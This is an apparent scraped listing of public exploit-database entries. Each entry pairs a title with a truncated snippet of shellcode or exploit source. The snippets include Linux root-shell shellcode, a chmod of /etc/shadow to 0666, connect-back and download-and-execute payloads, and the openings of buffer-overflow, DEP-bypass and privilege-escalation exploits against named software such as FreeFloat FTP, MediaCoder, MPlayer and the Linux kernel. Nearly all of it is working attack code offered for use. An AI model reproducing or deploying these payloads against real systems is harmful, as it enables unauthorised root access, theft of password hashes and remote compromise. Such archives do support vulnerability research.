linux/x86 setuid(0) & execve(/bin/sh,0,0) shellcode 28 bytes

No description provided by source. -------------------ASM---------------------- global start section .text start: ;setuid0 xor ebx,ebx lea eax,ebx+17h cdq int 80h ;execve/bin/sh,0,0 xor ecx,ecx push ecx push 0x68732f6e push 0x69622f2f lea eax,ecx+0Bh mov ebx,esp int 80h...

Find all writeable folder in filesystem linux polymorphic shellcode - 91 bytes

No description provided by source. / Title : Find all writeable folder in filesystem linux polymorphic shellcode . Name : 91 bytes Find all writeable folder in filesystem linux polymorphic shellcode . Date : Sat Jun 17 21:27:03 2010 Author : gunslinger yudha.gunslingeratgmail.com Web :...

linux/x86 setuid(0),setgid(0) execve(/bin/sh, [/bin/sh, NULL]) 37 bytes

No description provided by source. / Linux/x86 setuid0 + setgid0 + execve/bin/sh, /bin/sh, NULL - 37 bytes - [email protected] / char shellcode = \x6a\x17 // push $0x17 \x58 // pop %eax \x31\xdb // xor %ebx, %ebx \xcd\x80 // int $0x80 \x6a\x2e // push $0x2e \x58 // pop %eax \x53 // push %ebx...

Linux x86 egghunt shellcode

No description provided by source. / Exploit Title: Linux/x86 egghunt shellcode 29 bytes NULL free Date: 23-07-2011 Author: Ali Raheem Tested on: Linux Ali-PC.home 2.6.38.8-35.fc15.x8664 1 SMP Wed Jul 6 13:58:54 UTC 2011 x8664 x8664 x8664 GNU/Linux Linux injustice 2.6.38-10-generic 46-Ubuntu SMP...

linux/x86 setreuid(0,0) execve("/bin/sh", ["/bin/sh", NULL]) 33 bytes

No description provided by source. / Linux/x86 setreuid0,0 + execve/bin/sh, /bin/sh, NULL - 33 bytes - [email protected] / char shellcode = \x6a\x46 // push $0x46 \x58 // pop %eax \x31\xdb // xor %ebx, %ebx \x31\xc9 // xor %ecx, %ecx \xcd\x80 // int $0x80 \x31\xd2 // xor %edx, %edx \x6a\x0b // pus...

linux/x86 HTTP/1.x GET, Downloads and JMP - 68 bytes+

No description provided by source. / linux/x86 HTTP/1.x GET, Downloads and JMP - 68 bytes+ This shellcode allows you to download a binary code straight off a standard HTTP server and execute it. The downloaded shellcode e.g. binary code will be executed on the stack. DEMONSTRATION: Starting by...

Linux/MIPS - connect back shellcode (port 0x7a69) - 168 bytes.

No description provided by source. / Title: Linux/MIPS - connect back shellcode port 0x7a69 - 168 bytes. Author: rigan - imrigan sobachka gmail.com / include stdio.h char sc = \x24\x0f\xff\xfd // li t7,-3 \x01\xe0\x20\x27 // nor a0,t7,zero \x01\xe0\x28\x27 // nor a1,t7,zero \x28\x06\xff\xff // sl...

linux/x86 chmod(/etc/shadow, 0666) + exit() 32 bytes

No description provided by source. / linux/x86 chmod/etc/shadow, 0666 + exit - 32 bytes - izik [email protected] / char shellcode = \x6a\x0f // push $0xf \x58 // pop %eax \x31\xc9 // xor %ecx,%ecx \x51 // push %ecx \x66\xb9\xb6\x01 // mov $0x1b6,%cx \x68\x61\x64\x6f\x77 // push $0x776f6461...

linux/x86 setreuid(0, 0) + execve(/bin/sh) 31 bytes

No description provided by source. / linux/x86 setreuid0, 0 + execve/bin/sh, /bin/sh, NULL, NULL - 31 bytes - izik [email protected] / char shellcode = \x6a\x46 // push $0x46 \x58 // pop %eax \x31\xdb // xor %ebx,%ebx \x31\xc9 // xor %ecx,%ecx \xcd\x80 // int $0x80 \x99 // cltd \xb0\x0b // mov...

linux/x86 normal exit with random (so to speak) return value 5 bytes

No description provided by source. / linux/x86 normal exit w/ random so to speak return value - 5 bytes - izik [email protected] / char shellcode = \x31\xc0 // xor %eax,%eax \x40 // inc %eax \xcd\x80; // int $0x80 int mainint argc, char argv int ret; ret = int &ret + 2; ret = int shellcode; //...

FreeFloat FTP Server Buffer Overflow Exploit (DEP Bypass)

No description provided by source. !/usr/bin/python import socket, sys from struct import pack print \n=============================== print Freefloat FTP Server DEP Bypass print Written by Blake print ===============================\n if lensys.argv != 3: print Usage: %s target port\n % sys.argv...

MediaCoder 0.7.3.4605 - Local Buffer Overflow Exploit

No description provided by source. / Download: http://www.mediacoderhq.com/download.htm Compilation: mediac.c.......Win32cygwin,Devcpp Tested on Windows xp sp3 Date: 24.02.2010 1.We get control of EIP by overwriting a seh handler with pop pop retn instr and pass exception. 2.We position shellcode...

linux/x86 quick (yet conditional, eax != 0 and edx == 0) exit 4 bytes

No description provided by source. / linux/x86 quick yet conditional, eax != 0 and edx == 0 exit - 4 bytes - izik [email protected] / char shellcode = \xf7\xf0 // div %eax \xcd\x80; // int $0x80 int mainint argc, char argv int ret; ret = int &ret + 2; ret = int shellcode; // milw0rm.com 2006-01-21...

Magneto Net Resource ActiveX 4.0.0.5 - NetFileClose Exploit (Universal)

No description provided by source. html object classid='clsid:61251370-92BF-4A0E-8236-5904AC6FC9F2' id='target' //object script language='vbscript' 'Magneto Software Net Resource ActiveX v4.0.0.5 NetFileClose SEH Exploit Universal 'Author: dookie 'Original PoC by: s4squatch -...

linux/x86 cat /dev/urandom > /dev/console, just for kicks - 63 bytes

No description provided by source. / linux/x86 cat /dev/urandom /dev/console, no real profit just for kicks - 63 bytes - izik [email protected] / char shellcode = \x31\xc9 // xor %ecx,%ecx \x51 // push %ecx \x68\x6e\x64\x6f\x6d // push $0x6d6f646e \x68\x2f\x75\x72\x61 // push $0x6172752f...

Linux Kernel 2.6.x - ptrace_attach Local Privilege Escalation Exploit

No description provided by source. / ptraceattach privilege escalation exploit by s0m3b0dy tested on Gentoo 2.6.29rc1 grataz: Tazo, rassta, nukedclx, maciek, D0hannuk, mivus, wacky, nejmo, filo... email: s0m3b0dy1 at gmail.com / include grp.h include stdio.h include fcntl.h include errno.h includ...

Adobe util.printf() Buffer Overflow (2)

No description provided by source. $Id: adobeutilprintf.rb 10477 2010-09-25 11:59:02Z mc $ This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on licensing and terms of us...

TipxD <= 1.1.1 - Local Format String Vulnerability (not setuid)

No description provided by source. / tipxdexp.c TipxD Format String Vulnerability TipxD = 1.1.1 local exploit Proof of Concept Tested in Slackware 9.0 / 9.1 / 10.0 by CoKi [email protected] - SECU No System Group - http://www.nosystem.com.ar / include stdio.h include string.h define PATH...

GTA SA-MP server.cfg - Local Buffer Overflow Vulnerability

No description provided by source. GTA SA-MP server.cfg Local Buffer Overflow Vulnerability 0day Date: 9-26-11 Author: SilentDream Software Link: http://team.sa-mp.com/files/samp03csvrR2-2win32.zip Tested on: XP SP3, Windows 7 Thanks to: corelanc0d3r & team, Metasploit, Exploit-db. No PPRs found...

MPlayer Lite r33064 - m3u Buffer Overflow Exploit (DEP Bypass)

No description provided by source. !/usr/bin/perl +Exploit Title: MPlayer Lite r33064 m3u Buffer Overflow ExploitDEP BYPASS +Date: 24\07\2011 +Author: C4SS!0 and h1ch4m +Software Link: http://sourceforge.net/projects/mplayer-ww/files/MPlayerRelease/Revision%2033064/mplayerliter33064.7z/download...